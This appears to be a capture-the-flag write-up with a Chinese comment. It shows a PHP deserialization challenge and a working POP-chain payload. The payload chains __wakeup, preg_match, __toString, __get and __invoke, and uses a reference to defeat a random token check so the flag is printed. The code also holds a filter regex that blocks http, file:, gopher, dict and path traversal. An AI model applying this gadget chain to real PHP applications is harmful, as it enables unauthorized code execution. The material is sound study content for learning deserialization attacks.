<?php
class Read {
public $var;
public $token;
public $token_flag;
public function __construct() {
$this->token_flag = $this->token = md5(rand(1,10000));
}
public function __invoke(){
$this->token_flag = md5(rand(1,10000));
if($this->token === $this->token_flag)
{
echo "flag{**********}";
}
}
}
class Show{
public $source;
public $str;
public function __construct()
{
echo $this->source."<br>";
}
public function __toString()
{
$this->str['str']->source;
return '2333';
}
public function __wakeup()
{
if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
echo "hacker~";
$this->source = "index.php";
}
}
}
class Test
{
public $params;
public function __construct()
{
$this->params = array();
}
public function __get($key)
{
$func = $this->params;
return $func();
}
}
//payload
$x = new Test();
$a = new Show();
$b = new Show();
$c = new Read();
$c->token_flag = &$c->token;
$a->source = $b;
$a->source->str = ["str"=>$x];
$x->params = $c;
var_dump($b = serialize($a));
unserialize($b);
主要是
if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source))
这里的preg_match可以触发this->source的__toString(),长知识了
1664
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
